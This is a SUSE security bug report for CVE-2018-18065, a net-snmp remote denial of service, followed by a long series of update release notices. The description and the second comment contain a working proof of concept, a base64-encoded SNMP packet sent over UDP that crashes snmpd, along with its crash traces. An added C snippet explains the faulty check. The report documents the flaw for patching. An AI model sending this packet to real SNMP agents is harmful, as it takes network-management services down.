Bug 1111122 - (CVE-2018-18065) VUL-0: CVE-2018-18065: net-snmp: remote DoS (_set_key)
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Priority: P3 - Medium
Severity: Normal
Assigned To: Security Team bot
https://smash.suse.de/issue/216309/
CVSSv3:SUSE:CVE-2018-18065:7.5:(AV:N/...
Reported: 2018-10-08 21:55 UTC by Alexander Bergmann
Modified: 2022-03-21 17:18 UTC (History)
Description Alexander Bergmann 2018-10-08 21:55:19 UTC
https://dumpco.re/blog/net-snmp-5.7.3-remote-dos

VULN#2 CVE-2018-18065
=====================

Second bug is also remotely exploitable but only with knowledge of the community string (in this case "public") leading to Denial of Service:

  # echo -n "MIGfAgEBBAZwdWJsaWOhgZECATwCAQECAUAwgYUwIgYSKwYBBAGBfQgzCgIBBwqG3rc1BAwxNzIuMzEuMTkuNzMwFwYSKwYBAgEBCQEEgQECAAqG3rlgAgECMCMGEgsGAQQBgX0IMwoCAQcKht63NgQNMjU1LjI1NS4yNTUuMDAhBhIrBgECAQEJBgECAQoDAIbetzgECzE3Mi4zMS4xOS4y" | base64 -d > /dev/udp/127.0.0.1/1111

  # net-snmp-5.7.3/agent/snmpd -f -d -V -c ../../snmpd.conf -Ln  127.0.0.1:1111
  ASAN:SIGSEGV
  =================================================================
  ==41062==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000410 (pc 0x00000075bc0f bp 0x7ffdda226b10 sp 0x7ffdda2269e0 T0)
      #0 0x75bc0e in _set_key /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:564:9
      #1 0x75bc0e in _data_lookup /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:614
      #2 0x75bc0e in _container_table_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:749
      #3 0x572262 in netsnmp_call_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:526:15
      #4 0x572dc4 in netsnmp_call_next_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:640:12
      #5 0x58751c in table_helper_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table.c:713:9
      #6 0x572262 in netsnmp_call_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:526:15
      #7 0x572c79 in netsnmp_call_handlers /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:611:14
      #8 0x520d86 in handle_var_requests /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:2679:22
      #9 0x524dbe in handle_pdu /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:3441:18
      #10 0x51b976 in netsnmp_handle_request /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:3284:14
      #11 0x515876 in handle_snmp_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:1990:10
      #12 0x7f3558 in _sess_process_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5437:7
      #13 0x7ef331 in _sess_read /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5877:14
      #14 0x7ed2e0 in snmp_sess_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5911:10
      #15 0x7ed2e0 in snmp_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5502
      #16 0x4f9286 in receive /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1375:15
      #17 0x4f9286 in main /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1118
      #18 0x7fc1acb11b44 in __libc_start_main /build/glibc-6V9RKT/glibc-2.19/csu/libc-start.c:287
      #19 0x4f617c in _start (/home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd+0x4f617c)

  AddressSanitizer can not provide additional info.
  SUMMARY: AddressSanitizer: SEGV /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:564 _set_key
  ==41062==ABORTING
Comment 2 Alexander Bergmann 2018-10-08 22:13:59 UTC
SLE-15 reproducer:

Just install net-snmp and use the default configuration.

Console 1:

#> snmpd -V -f -a -Lo

Console 2:

#> echo -n "MIGfAgEBBAZwdWJsaWOhgZECATwCAQECAUAwgYUwIgYSKwYBBAGBfQgzCgIBBwqG3rc1BAwxNzIu
MzEuMTkuNzMwFwYSKwYBAgEBCQEEgQECAAqG3rlgAgECMCMGEgsGAQQBgX0IMwoCAQcKht63NgQN
MjU1LjI1NS4yNTUuMDAhBhIrBgECAQEJBgECAQoDAIbetzgECzE3Mi4zMS4xOS4y" \
| base64 -d > /dev/udp/127.0.0.1/161


Output on console 1:

NET-SNMP version 5.7.3
Connection from UDP: [127.0.0.1]:57142->[127.0.0.1]:161
Received SNMP packet(s) from UDP: [127.0.0.1]:57142->[127.0.0.1]:161
  GETNEXT message
    -- SNMPv2-SMI::enterprises.253.8.51.10.2.1.7.10.14130101
    -- SNMPv2-MIB::sysORUpTime.129.2.0.10.14130400
    -- ccitt.11.6.1.4.1.253.8.51.10.2.1.7.10.14130102
    -- SNMPv2-MIB::sysORTable.6.1.2.1.10.3.0.14130104
netsnmp_assert (((void *)0) != tblreq_info) && (tblreq_info->colnum <= tad->tblreg_info->max_column) failed helpers/table_container.c:606 _data_lookup()
Segmentation fault (core dumped)
Comment 3 Alexander Bergmann 2018-10-08 23:11:05 UTC
After the fix is applied, no netsnmp_assert will be triggered:

#> snmpd -V -f -a -Lo
NET-SNMP version 5.7.3
Connection from UDP: [127.0.0.1]:33362->[127.0.0.1]:161
Received SNMP packet(s) from UDP: [127.0.0.1]:33362->[127.0.0.1]:161
  GETNEXT message
    -- SNMPv2-SMI::enterprises.253.8.51.10.2.1.7.10.14130101
    -- SNMPv2-MIB::sysORUpTime.129.2.0.10.14130400
    -- ccitt.11.6.1.4.1.253.8.51.10.2.1.7.10.14130102
    -- SNMPv2-MIB::sysORTable.6.1.2.1.10.3.0.14130104
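
The failure pattern visible in the Comment 2 output (the assertion is logged, then the process segfaults) can be modelled in a few lines. This is an added example, not net-snmp code and not the SUSE patch. All type, macro and function names are hypothetical, and it assumes the crash comes from a NULL per-request pointer that is only covered by a log-only assertion.

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical, simplified stand-ins; not net-snmp's real structures. */
struct table_request { unsigned colnum; };
struct table_reg     { unsigned max_column; };
enum { LOOKUP_OK = 0, LOOKUP_REJECTED = -1 };

static int soft_assert_failures;   /* how often a failed check was recorded */

/* Log-only assertion: reports the failure, then lets execution continue. */
#define SOFT_ASSERT(cond) do { if (!(cond)) { soft_assert_failures++; \
    fprintf(stderr, "assert (%s) failed\n", #cond); } } while (0)

/* "Before" shape: the only guard is the log-only assertion, so a NULL
 * req is reported and then dereferenced on the next line. */
int lookup_assert_only(const struct table_request *req,
                       const struct table_reg *reg, unsigned *col)
{
    SOFT_ASSERT(req != NULL && req->colnum <= reg->max_column);
    *col = req->colnum;            /* crashes when req == NULL */
    return LOOKUP_OK;
}

/* Hardened shape: the same condition is enforced with an early return. */
int lookup_checked(const struct table_request *req,
                   const struct table_reg *reg, unsigned *col)
{
    if (req == NULL || reg == NULL || req->colnum > reg->max_column) {
        soft_assert_failures++;    /* still count it for diagnostics */
        return LOOKUP_REJECTED;    /* dereference is never reached */
    }
    *col = req->colnum;
    return LOOKUP_OK;
}

/* Run a batch of per-varbind requests; returns how many were rejected. */
int process_batch(const struct table_request *const reqs[], size_t n,
                  const struct table_reg *reg)
{
    int rejected = 0;
    unsigned col;
    for (size_t i = 0; i < n; i++)
        if (lookup_checked(reqs[i], reg, &col) != LOOKUP_OK)
            rejected++;
    return rejected;
}
```

The point for review is that an assertion which only logs is not a validation step: any pointer or range it mentions still needs an enforced check before the first dereference.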
Comment 5 Swamp Workflow Management 2018-10-09 00:30:06 UTC
This is an autogenerated message for OBS integration:
This bug (1111122) was mentioned in
https://build.opensuse.org/request/show/640702 42.3 / net-snmp
https://build.opensuse.org/request/show/640703 15.0 / net-snmp
Comment 7 Swamp Workflow Management 2018-10-23 13:19:34 UTC
SUSE-SU-2018:3319-1: An update that fixes one vulnerability is now available.

Category: security (important)
Bug References: 1111122
CVE References: CVE-2018-18065
Sources used:
SUSE Linux Enterprise Server 12-LTSS (src):    net-snmp-5.7.2.1-4.9.1
Comment 8 Swamp Workflow Management 2018-10-23 16:17:15 UTC
SUSE-SU-2018:3333-1: An update that solves one vulnerability and has three fixes is now available.

Category: security (important)
Bug References: 1027353,1081164,1102775,1111122
CVE References: CVE-2018-18065
Sources used:
SUSE Linux Enterprise Module for Basesystem 15 (src):    net-snmp-5.7.3-7.3.1
Comment 9 Swamp Workflow Management 2018-10-24 13:17:14 UTC
openSUSE-SU-2018:3381-1: An update that solves one vulnerability and has three fixes is now available.

Category: security (important)
Bug References: 1027353,1081164,1102775,1111122
CVE References: CVE-2018-18065
Sources used:
openSUSE Leap 15.0 (src):    net-snmp-5.7.3-lp150.6.3.1
Comment 10 Swamp Workflow Management 2018-10-25 16:19:33 UTC
SUSE-SU-2018:3447-1: An update that solves one vulnerability and has three fixes is now available.

Category: security (important)
Bug References: 1027353,1081164,1102775,1111122
CVE References: CVE-2018-18065
Sources used:
SUSE OpenStack Cloud 7 (src):    net-snmp-5.7.3-6.3.1
SUSE Linux Enterprise Software Development Kit 12-SP3 (src):    net-snmp-5.7.3-6.3.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    net-snmp-5.7.3-6.3.1
SUSE Linux Enterprise Server 12-SP3 (src):    net-snmp-5.7.3-6.3.1
SUSE Linux Enterprise Server 12-SP2-LTSS (src):    net-snmp-5.7.3-6.3.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    net-snmp-5.7.3-6.3.1
SUSE Linux Enterprise Server 12-SP1-LTSS (src):    net-snmp-5.7.3-6.3.1
SUSE Linux Enterprise Desktop 12-SP3 (src):    net-snmp-5.7.3-6.3.1
SUSE Enterprise Storage 4 (src):    net-snmp-5.7.3-6.3.1
SUSE CaaS Platform 3.0 (src):    net-snmp-5.7.3-6.3.1
Comment 11 Andreas Stieger 2018-10-26 18:28:00 UTC
done
Comment 12 Swamp Workflow Management 2018-10-26 22:18:36 UTC
openSUSE-SU-2018:3508-1: An update that solves one vulnerability and has three fixes is now available.

Category: security (important)
Bug References: 1027353,1081164,1102775,1111122
CVE References: CVE-2018-18065
Sources used:
openSUSE Leap 42.3 (src):    net-snmp-5.7.3-7.3.1
Comment 13 Swamp Workflow Management 2019-04-27 22:25:57 UTC
SUSE-SU-2018:3447-2: An update that solves one vulnerability and has three fixes is now available.

Category: security (important)
Bug References: 1027353,1081164,1102775,1111122
CVE References: CVE-2018-18065
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP1 (src):    net-snmp-5.7.3-6.3.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 25 Swamp Workflow Management 2022-01-11 14:20:40 UTC
SUSE-SU-2022:0050-1: An update that solves two vulnerabilities, contains one feature and has 13 fixes is now available.

Category: security (important)
Bug References: 1027353,1081164,1102775,1108471,1111122,1116807,1140341,1145864,1152968,1174961,1178021,1178351,1179009,1179699,1181591
CVE References: CVE-2018-18065,CVE-2020-15862
JIRA References: SLE-6120
Sources used:
SUSE Linux Enterprise Server for SAP 15-SP1 (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise Server 15-SP1-LTSS (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise Server 15-SP1-BCL (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP3 (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (src):    net-snmp-5.7.3-10.9.1
SUSE Enterprise Storage 6 (src):    net-snmp-5.7.3-10.9.1
SUSE CaaS Platform 4.0 (src):    net-snmp-5.7.3-10.9.1

Comment 26 Swamp Workflow Management 2022-01-11 14:23:06 UTC
openSUSE-SU-2022:0050-1: An update that solves two vulnerabilities, contains one feature and has 13 fixes is now available.

Category: security (important)
Bug References: 1027353,1081164,1102775,1108471,1111122,1116807,1140341,1145864,1152968,1174961,1178021,1178351,1179009,1179699,1181591
CVE References: CVE-2018-18065,CVE-2020-15862
JIRA References: SLE-6120
Sources used:
openSUSE Leap 15.3 (src):    net-snmp-5.7.3-10.9.1
Comment 27 Swamp Workflow Management 2022-02-25 14:18:02 UTC
openSUSE-SU-2022:0050-1: An update that fixes 21 vulnerabilities, contains one feature is now available.

Category: security (important)
Bug References: 1027353,1081164,1102775,1108471,1111122,1116807,1140341,1145864,1152968,1174961,1178021,1178351,1179009,1179699,1181591
CVE References: CVE-2018-18065,CVE-2020-15862,CVE-2022-0452,CVE-2022-0453,CVE-2022-0454,CVE-2022-0455,CVE-2022-0456,CVE-2022-0457,CVE-2022-0458,CVE-2022-0459,CVE-2022-0460,CVE-2022-0461,CVE-2022-0462,CVE-2022-0463,CVE-2022-0464,CVE-2022-0465,CVE-2022-0466,CVE-2022-0467,CVE-2022-0468,CVE-2022-0469,CVE-2022-0470
JIRA References: SLE-6120
Sources used:
openSUSE Leap 15.3:NonFree (src):    opera-84.0.4316.14-lp153.2.36.1
openSUSE Leap 15.3 (src):    net-snmp-5.7.3-10.9.1
Comment 28 Swamp Workflow Management 2022-03-21 17:18:29 UTC
SUSE-SU-2022:0050-2: An update that solves two vulnerabilities, contains one feature and has 13 fixes is now available.

Category: security (important)
Bug References: 1027353,1081164,1102775,1108471,1111122,1116807,1140341,1145864,1152968,1174961,1178021,1178351,1179009,1179699,1181591
CVE References: CVE-2018-18065,CVE-2020-15862
JIRA References: SLE-6120
Sources used:
SUSE Manager Server 4.1 (src):    net-snmp-5.7.3-10.9.1
SUSE Manager Retail Branch Server 4.1 (src):    net-snmp-5.7.3-10.9.1
SUSE Manager Proxy 4.1 (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise Server for SAP 15-SP2 (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise Server 15-SP2-LTSS (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise Server 15-SP2-BCL (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise Realtime Extension 15-SP2 (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS (src):    net-snmp-5.7.3-10.9.1
SUSE Enterprise Storage 7 (src):    net-snmp-5.7.3-10.9.1
